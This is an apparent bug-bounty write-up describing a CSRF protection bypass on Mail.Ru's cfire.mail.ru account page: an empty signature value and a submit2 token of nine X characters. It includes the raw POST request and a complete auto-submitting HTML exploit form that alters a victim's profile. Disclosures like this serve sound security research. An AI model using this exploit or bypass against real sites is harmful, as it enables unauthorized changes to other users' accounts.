While I was pentesting many sub-domains of Mail.Ru at the same time, I came upon cfire.mail.ru – Since this one also had a user portal so it caught my eye!
I first started testing for Cross-Site Scripting issues in different (GET/POST) parameters. While fuzzing them, I kept Burpsuite interception ON and it was capturing all the requests as a middle-ware proxy.
Whilst fuzzing the POST request sent to
/account endpoint, this request came up:
POST /account/ HTTP/1.1 Host: cfire.mail.ru User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Referer: https://cfire.mail.ru/account/ Cookie: <cookies-here. Connection: keep-alive Content-Type: application/x-www-form-urlencoded Content-Length: 167 signature=<csrf-token here>&firstname=Hacked&lastname=&bdday=0&bdmonth=0&bdyear=0&postindex=&country=&city=&address=&submit2=<another 9-character csrf-token here>
I found that there are two CSRF tokens:
- Signature – with a long CSRF token
- submit2 – with a length of nine, combined with numbers and alphabets
I tried bypassing both the CSRF protections by removing both parameters – It didn’t worked 🙁
After giving some time to it, I removed the
value (not the parameter itself) of the
signature parameter and tried replaying the request, it worked!
Now the next target for me was to bypass the
submit2. I also tried removing the value of
submit2 – But this time, this technique didn’t worked! So I tried different ways of bypassing.
After like 15(ish) minutes. I tried replacing the 9-lengthened alpha-numeric value of
submit2 and modified it to: nine X values (i.e:
XXXXXXXXX) And guess what? It worked. BOOM! Now we I made a HTML exploit for this specific CSRF issue which was something like this:
<html> <body> <form action="https://cfire.mail.ru/account/" method="POST" name="exploit"> <input type="hidden" name="signature" value="" /> <input type="hidden" name="firstname" value="Pwn3d" /> <input type="hidden" name="lastname" value="" /> <input type="hidden" name="bdday" value="0" /> <input type="hidden" name="bdmonth" value="0" /> <input type="hidden" name="bdyear" value="0" /> <input type="hidden" name="postindex" value="" /> <input type="hidden" name="country" value="" /> <input type="hidden" name="city" value="" /> <input type="hidden" name="address" value="" /> <input type="hidden" name="submit2" value="XXXXXXXXX" /> </form> <script>document.exploit.submit()</script> </body> </html>
I tried this exploit in different cFire accounts. And it worked! So in simple words:
Removing the value of
signatureAND changing the value of
XXXXXXXXXwill bypass both protections.
Thanks for reading till here, I hope you learned something. Happy Hacking!